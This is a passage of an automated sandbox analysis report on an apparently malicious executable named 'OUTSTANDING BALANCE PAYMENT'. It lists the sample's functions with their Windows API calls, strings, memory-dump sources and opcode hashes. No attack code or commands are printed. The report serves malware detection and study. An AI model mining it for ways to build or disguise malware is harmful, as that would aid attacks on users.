                                                                  • Instruction Fuzzy Hash: FF41F676A1020ABBDF21AAA4CC42FEF77BDAF89710F100069F605EB181D7759A14CF50
                                                                  Function 002EA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 002EA85A
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002EA86F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: 4f0edb5dee101e5c9d4300fe95f9f827b2920b4ff422988f615d32e205af7f37
                                                                  • Instruction ID: 4afb9b6c98a56e785b5fa9b3cbadc9b2946bd6a5a6d499f66ebbe64de0b150b0
                                                                  • Opcode Fuzzy Hash: 4f0edb5dee101e5c9d4300fe95f9f827b2920b4ff422988f615d32e205af7f37
                                                                  • Instruction Fuzzy Hash: 0E410874E5134A9FDB14CF69C881BDABBB9FB09300F51016AE909AB381D770A951CFA1
                                                                  Function 002E975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 002E980E
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002E984A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: aa5696134e1211b36590917aa6118862a85374a71d6ff93b3789089d06212fd7
                                                                  • Instruction ID: e473435e8385011dd21096994118c52691eed47f70a092cb97d84c4738d0e7dc
                                                                  • Opcode Fuzzy Hash: aa5696134e1211b36590917aa6118862a85374a71d6ff93b3789089d06212fd7
                                                                  • Instruction Fuzzy Hash: 08319E71160645AEEB11DF75CC80BFB73A9FF59760F40861AF8A9C7190CA31ACA1CB60
                                                                  Function 002C5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C51C6
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002C5201
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 98bb03e744b38f706376f9936e51dc810218216071d313b9a23509fcda35f8ad
                                                                  • Instruction ID: e43c9b087d904c8fdb3c2f618374712c0408b1c4a8ff972e254e67b2730d7a30
                                                                  • Opcode Fuzzy Hash: 98bb03e744b38f706376f9936e51dc810218216071d313b9a23509fcda35f8ad
                                                                  • Instruction Fuzzy Hash: 6B3125316207169BEB24CF88C844F9EBBF8EF41350F14021DED85A61A0D7B0F990DB12
                                                                  Function 002D658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __snwprintf
                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                  • API String ID: 2391506597-2584243854
                                                                  • Opcode ID: 24a10c3739c63fd30b6d0f8e355c836b27c447e7afffa78c67ef15981c645d21
                                                                  • Instruction ID: ce1d4325c33414a4d5f0dec06da11e3f5915ffee87fcb6b4eecc4fada012f451
                                                                  • Opcode Fuzzy Hash: 24a10c3739c63fd30b6d0f8e355c836b27c447e7afffa78c67ef15981c645d21
                                                                  • Instruction Fuzzy Hash: 22218E75620118ABCF11EFA4C886EEE77B8AF45740F00445AF405AB281DB74EE65CFA1
                                                                  Function 002E93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002E945C
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002E9467
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: 706fb31bf0127cb0881bc85da8bcd6c79caf5b8a0b0768d9dc87720d74e45dc2
                                                                  • Instruction ID: e72b9fb04c703f4a0c5dda20e57c75786404c97ba899220fcf4431ef1f247b94
                                                                  • Opcode Fuzzy Hash: 706fb31bf0127cb0881bc85da8bcd6c79caf5b8a0b0768d9dc87720d74e45dc2
                                                                  • Instruction Fuzzy Hash: 5F11B2713602496FEF119F56DC80EBB376EEB483A4F500126F918972E0D6719CA28B60
                                                                  Function 002EDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • GetActiveWindow.USER32 ref: 002EDA7B
                                                                  • EnumChildWindows.USER32(?,002ED75F,00000000), ref: 002EDAF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                  • String ID: T1-
                                                                  • API String ID: 3814560230-393610425
                                                                  • Opcode ID: 6511824e98f19e55762ef24d49ba7a80d6afea90e52afaaeaa362c892a93099f
                                                                  • Instruction ID: 6837caa9b070dcca7a501b67eb7614062ce2bc7985ebdcf0cd4a2fdf6affe19c
                                                                  • Opcode Fuzzy Hash: 6511824e98f19e55762ef24d49ba7a80d6afea90e52afaaeaa362c892a93099f
                                                                  • Instruction Fuzzy Hash: 80213D39254601DFC716DF29E850AA6B3E9EB4A320F56061DED698B3E0DB34B850CF50
                                                                  Function 002E98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                    • Part of subcall function 0029D17C: GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                    • Part of subcall function 0029D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002E9968
                                                                  • GetSysColor.USER32(00000012), ref: 002E9982
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: 5884ae0c47ca6819db2d84583804d5ce76322a04f6954a138bf52ccd3e46d09e
                                                                  • Instruction ID: da8140adf86df0c6a3aa9b69f896189b2c1be51dda06b232bf6e1f430b34eeca
                                                                  • Opcode Fuzzy Hash: 5884ae0c47ca6819db2d84583804d5ce76322a04f6954a138bf52ccd3e46d09e
                                                                  • Instruction Fuzzy Hash: 4711377256020AAFDF05DFB8CC45AEA7BA8FB08344F014629FD55E3251E735E860DB60
                                                                  Function 002E9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 002E9699
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002E96A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: 6463896850c0cd419ae7b2fe5d29960247fe449484ce0f6a9699ab52491dff2a
                                                                  • Instruction ID: ef6a814fd048c85d402adc0d7bcc8af96c7bace13803598cbb2bfc5ff8a596c9
                                                                  • Opcode Fuzzy Hash: 6463896850c0cd419ae7b2fe5d29960247fe449484ce0f6a9699ab52491dff2a
                                                                  • Instruction Fuzzy Hash: C511BC71160149ABEF119FA5DC40EEB3B6EEB05378F900316F924971E0C771DCA09B60
                                                                  Function 002C5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C52D5
                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002C52F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 921c6ba7717dec901ca21baa76c5a452775a4691f82b2193f0af56c3eb0a5190
                                                                  • Instruction ID: b13fba5d7dcffffaff7365608ed3bfa8b2ca655891ebb619c1e6c7e71a669513
                                                                  • Opcode Fuzzy Hash: 921c6ba7717dec901ca21baa76c5a452775a4691f82b2193f0af56c3eb0a5190
                                                                  • Instruction Fuzzy Hash: 94110336E21A25ABDB11DE98C800F9D77E8AF46350F040259EC12E7190D7B0FD90CBD1
                                                                  Function 002D4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002D4DF5
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002D4E1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: 6e6b07c19c40e12e57fc0e13d61a62d4fdb8015f9f42fea18547432a74d16062
                                                                  • Instruction ID: 8fc6d8024f9a35ec8f593f27e7a5e85aeb94a1c082d7be0c65eb6f16f02dedd6
                                                                  • Opcode Fuzzy Hash: 6e6b07c19c40e12e57fc0e13d61a62d4fdb8015f9f42fea18547432a74d16062
                                                                  • Instruction Fuzzy Hash: 2511A070521222BBDB259F51C889EFBFBA9FF06754F10822BF50596280D3B05D60C6E0
                                                                  Function 002AA70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002B37A7
                                                                  • ___raise_securityfailure.LIBCMT ref: 002B388E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                  • String ID: (4
                                                                  • API String ID: 3761405300-1560626354
                                                                  • Opcode ID: 161e9f6253ef17beef684a4d2a78529316c94a5a19e3c88b694c55fc540def6a
                                                                  • Instruction ID: daa3dd6847a13a28ace8dd1eb39f6934b7785c88725dedcfe3c0315c7a74156f
                                                                  • Opcode Fuzzy Hash: 161e9f6253ef17beef684a4d2a78529316c94a5a19e3c88b694c55fc540def6a
                                                                  • Instruction Fuzzy Hash: DF212CB9610A04DAD70ADF65F9956407BB8BB4A310F10582AEB048F3A1DBF079E5CF45
                                                                  Function 002DA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 002DA84E
                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 002DA88B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: htonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 3832099526-2422070025
                                                                  • Opcode ID: a2b239d68154f56e0856a368773293691ee9a31576b25365d67aad94a3e09bce
                                                                  • Instruction ID: 5410f367d3af08c25766e0c29303a31c23ca4f29dc106245938fff21bf865dd7
                                                                  • Opcode Fuzzy Hash: a2b239d68154f56e0856a368773293691ee9a31576b25365d67aad94a3e09bce
                                                                  • Instruction Fuzzy Hash: F601D675210305ABCB119F64C896FA9B364FF44714F20852BF916973D1D771EC219B52
                                                                  Function 002BB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002BB7EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: af2ac6c27d9b1e103d51ba532e6a5ebe16f5f3881aeacda3f7e3aec61af10f92
                                                                  • Instruction ID: a30f95a8b7286a61862edc02171e3540e1825d7458887e38e05920d1aa185354
                                                                  • Opcode Fuzzy Hash: af2ac6c27d9b1e103d51ba532e6a5ebe16f5f3881aeacda3f7e3aec61af10f92
                                                                  • Instruction Fuzzy Hash: E8012875621114ABCB05FFA4CC529FE73ADBF05394B54061DF461572C1EFB058288B60
                                                                  Function 002BB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 002BB6EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 26622441b133430a63cf647785ea08e4b08a2647a3ce8722c8ee0e991d380254
                                                                  • Instruction ID: 3ebf4b4356f668b07218b999fd4350a50d7e18ce77c66e600301bb3b2ca1f0f3
                                                                  • Opcode Fuzzy Hash: 26622441b133430a63cf647785ea08e4b08a2647a3ce8722c8ee0e991d380254
                                                                  • Instruction Fuzzy Hash: E301A7756610046BCB15FBA4C953AFF73AC9F05384F540019B502B32C1EFA05E288BB5
                                                                  Function 002BB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 002BB76C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 81e0fbae872f9ffbb23e265a2354fb389b6e6f1cb66110b948bf1a81b99e9b2f
                                                                  • Instruction ID: 9489ada3525f168304f485c889c9b5d56f019de47a53e4b23994e40a6eadcd23
                                                                  • Opcode Fuzzy Hash: 81e0fbae872f9ffbb23e265a2354fb389b6e6f1cb66110b948bf1a81b99e9b2f
                                                                  • Instruction Fuzzy Hash: 7E01DB76651104ABC705FBA4C952EFF73AC5F05384F640019B401731D1DFA05E299BB5
                                                                  Function 002A4D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: "4
                                                                  • API String ID: 3494438863-1647781385
                                                                  • Opcode ID: 8da7b3dbf7e9a45412013ebe38c9d1f4ac995e77cf6019993a880fc05e04033b
                                                                  • Instruction ID: 006b602fbebb7402718ddedcf202e36fef1efb7f017030e1e06b009da53d098b
                                                                  • Opcode Fuzzy Hash: 8da7b3dbf7e9a45412013ebe38c9d1f4ac995e77cf6019993a880fc05e04033b
                                                                  • Instruction Fuzzy Hash: 1CF0FC75229F029BE756AF29BC416676BD8FB47720F14091AF200DE185EFF0D8514F94
                                                                  Function 00284024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00280000,00000063,00000001,00000010,00000010,00000000), ref: 00284048
                                                                  • EnumResourceNamesW.KERNEL32(00000000,0000000E,002C67E9,00000063,00000000,76950280,?,?,00283EE1,?,?,000000FF), ref: 002F41B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
